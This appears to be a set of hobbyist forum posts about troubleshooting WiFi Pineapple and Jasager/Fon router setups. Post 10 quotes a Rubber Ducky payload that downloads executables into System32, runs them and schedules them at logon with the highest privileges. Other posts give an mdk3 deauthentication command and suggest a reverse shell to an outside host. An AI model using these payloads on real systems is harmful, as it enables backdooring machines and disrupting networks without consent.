  1. So far I'm loving my mk5 and a big thanks to the team for developing such a great product! What I have not really figured out or seen on the forum is what people are or will use their dip switches for. So I thought we should have a thread with configurations and ideas! as a side note well I'm trying to figure out what cool things I could do with them, I have not been able to figure out when in the boot process commands in the dip switch config get issued...
  2. thanks i did get this working it seems they were in fact reversed or rather became reversed after a reset. I do hope this issue makes it into an early update
  3. Thanks! 1) thanks ill look at that 2) I Know its new it just seems so strange that everything worked the first boot then fell apart, and will not work again even after a reset. Idealy i would like to try a reflash. 3) ya that topic was one that i was talking in but we never found a solution the op was not trying to use client mode
  4. ok so I thought I would start a new topic and see if anyone can shed some light. the issue is every time I try to use the client mode with the second radio things stop working. I do understand theres an encryption issue but I have tried with no encryption with wep and with wpa2 nd have the same result every time. 1) pineapple ap stopping in client mode as soon as I enable client mode my pineapple wifi disappears... I'm not sure if this is an expected behaviour or not if it uses the same card for the client as it does for the ap but ideally I would like to deploy this with just a mobil device so I enable client mode then set my other settings but right now as soon as i enable client mode I can no longer access the device without an ethernet connection. 2) pineapple does not know its a client so once i connect to a network in client mode with ethernet from my laptop, the client mode screen shows "Connection initiated. See below for connection details." and below it shows "not connected refreshing in 10 seconds" and never shows as connected. the network screen shows the default gateway as 192.168.1.1 as it should be. from ssh i can ping 8.8.8.8 and on network tile on the home page shows "wlan1: NA" but if i hit show Internet IP it displays as expected. also the red led never comes on when i use the client mode window 3) after starting client mode karma will not start ok so the last issue is after starting client mode I an unable to start karma. through the web interface nothing at all happens. if i try to start it from ssh using "/etc/init.d/karma start" I get "Failed to connect to hostapd - wpa_ctrl_open: No such file or directory". I have also tried enabling karma before starting client mode bust as soon as I do karma stops working. I should also mention if I use ICS from linux everything works as expected also strangely enough everything seemed to work correctly after the very first boot. but after i removed power and later tried again things fell apart. hopefully someone can shed some light on this for me.
  5. I dont know about the states but in canada most service providers provide ip's nat'ed in their system. if this is the case your best bet is a reverse shell from the pineapple. you could set it up to connect to an outside device ever 30 minutes and when it boots? I have a vm always running for this reason just waiting for connections in tmux sessiosns that i remote into when i need to Edit: or you could setup a vpn and configure you phone or the pineapple to connect to it then you could use the web interface or ssh at the expense of phone battery life. just a few ideas
  6. you may have to do: opkg update first if it says cant find twisted-web package when you try to install
  7. ya ill give it a try with ics from my laptop. Ive just been playing with client mode as I can see that being very useful in the field the weird part is client mode seems to work in that it connect gets an ip and gives the system internet as well as my laptop on eth0 but the web ui does not seem to know it works... the only evidence is show public ip
  8. very! I have yet to get it back up and working it seems i can have karma or internet but not both
  9. having the same issue. when I got my pineapple and first booted it client mode worked fine even on wpa2 and Karma worked. after trying sslstrip everything stopped working. I did a reset system defaults and now starting client mode it says not connected refreshing in 10 seconds but if i close that window and click show public ip on the network box it does have one and i can use the bar, and if i try to start karma i get the same error "Failed to connect to hostapd - wpa_ctrl_open: No such file or directory" UPDATE after a bit more playing I figure that I can start karma as long as it's the first thing I do after a reset but if i bring up the other wlan or try client mode I can no longer start karma
  10. I'm using Kali to create my payload and having a few issued. I'm trying a rev dbd and simple-ducky does not seem to be doing anything with my input. when it asks for my rev address and port i enter them then when it asks for my website i enter that and when it asks if i want to start listening I say yes and get two errors. chmod: cannot access `/usr/share/simple-ducky/misc/dbd/binaries/dbd': No such file or directory cp: cannot stat `/usr/share/simple-ducky/misc/dbd/binaries/dbd': No such file or directory listening on port 1331 and it does not enter my input into the payload. relevant part of payload: STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///winmgnt.txt','%WINDIR%\System32\winmgnt.exe') ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///taskmgnt.txt','%WINDIR%\System32\taskmgnt.exe') ENTER STRING %WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\winmgnt.exe ENTER STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe" anyone got any ideas? is it something with my install? thanks!
  11. very cool! im excited about this project when i make it out to the cabin to pick up my Teensys ill be playing with this!
  12. I love the idea!!!! and it looks like your doing well with it so far!
  13. lol ill give that a shot thanks!
  14. im assuming it is didn't u put it there? when i tried to install the one i downloaded it said it was already installed. this was on a fresh install of the Jasager firmware.
  15. ok so from reading the forum i have found that mdk3 can work on the fon and it is built into the Jasager firmware. i would like to try running it on a second fon I was going to use the Jasager firmware on both fons so on the deauth fon i installed "libpthread_0.9.28-8_mips.ipk" then created a monitor interface "wlanconfig ath1 create wlandev wifi0 wlanmode monitor" then ran "mdk3 ath1 d" however i get "Segmentation fault" i tried google but couldn't find the answer to this problem any help would be great!
  16. some very cool networks here i would love to go rack mount but cant justify the cost for now heres my home network more or less im sure im missing a few things only really put on key systems when i get a chance ill post some pics of the setup but heres a map for the time being just finished moving most of the system to gigabit the wifi bridge is to my sisters house who lives just down the street and is to cheap to buy internet or her own printer so she shares mine
  17. i know this post is getting old but i used this http://www.horto.ca/?p=12 how to for a time machine backup for my mac book, it works great!!! it's for the dns-232 but u could use it for anything
  18. Sorry Demo I had to run out of town last minute and dont have my netbook here so couldn't try linux should be heading home tomorrow though!
  19. will do! i'll test that tonight. the idea is that i will use my fit-pc2 to run the device http://www.fit-pc.com it's a great little 1.6ghz device the size of the fon that runs on only 5w of power so ill set that up this weekend i think. the best part is no shortage of space so it can just dump to a file and not worry about space or speed (running ubuntu on it right now)
  20. i was having the same issue with my second router at first i just kept playing with ip setting and added the open dns ip's to the webif sadly right now i have the open mesh dhcp on but not getting ip's in the Jasager interface every one keeps saying use the Jasager dhcp not the laptops dhcp however i cant figure out how to turn off the windows one? i have it working like this on window although i have tried the ics on windows mac and ubuntu if u think the issue could be the router u could try installing dd-wrt and see if you get connections and internet correctly the only reason i picked dd-wrt is because it has a very very simple ui to setup and there are lots of tutorials on how to put it on the fon i should say i ordered 23 (the price drops when u hit 20 i coulda proly done with 10-15) routers 3 just for me and 20 for a mesh project im working on and i only had the issue with one of them the other 22 have all been installed and seem to be working great and the one i had the issue with the antenna was damaged in shipping so i dono if something else could have happened to it as well
  21. ok back to update i tried Whig's idea and created an unsecured ap with a spare wrt54gl connected to it then unpluged it and still no luck so i went back to the start and reflashed and refashed and reflashed 7 more times then i said screw it and pulled a brand new fon from the box and tried again worked first time! 100%! i found that strange so i flashed dd-wrt on the first one and added it to my home network and tried to access the wifi but no luck i could see it but couldnt log in. after trying about 40 times i got in 6 times so i sent off an email to open-mesh.com and asked about it they said it could be a hardware issue and they will send me a replacement A+++ customer service if u need a fon type device i recommend them! thank you all for trying to help!!!!
  22. ya i understand thats what it does however of the 30 or 40 ssid's that go past around 12-15 are for coffee shops and airports all with no encryption... i am using my work laptop a windows pc as my target so i did as u said and manually added a network by the name "abctestssid" it sat for a long time and then said failed to connect i also tried this on my ubuntu netbook and after sitting for a long time it asked me for the wpa key and that seemed odd to me the only person who has ever shown up in my client list was the same mac address and kept connecting to the OpenWrt ssid of the fon so i changed it thinking someone nearby must have set a computer to connect to an openwrt ap at some point, i changed the ssid to 32749645 and right away same guy connects... so im assuming someone nearby is simply looking for free internet as in the client list the ssid next to his name is always the one i set in the device and if i set it to not broadcast ssid he does not connect. however aside from simply connecting to the routers programed ssid i have yet to get one of my target machines to connect to the box
  23. sure did! and tested it with w wifi ap and it is working
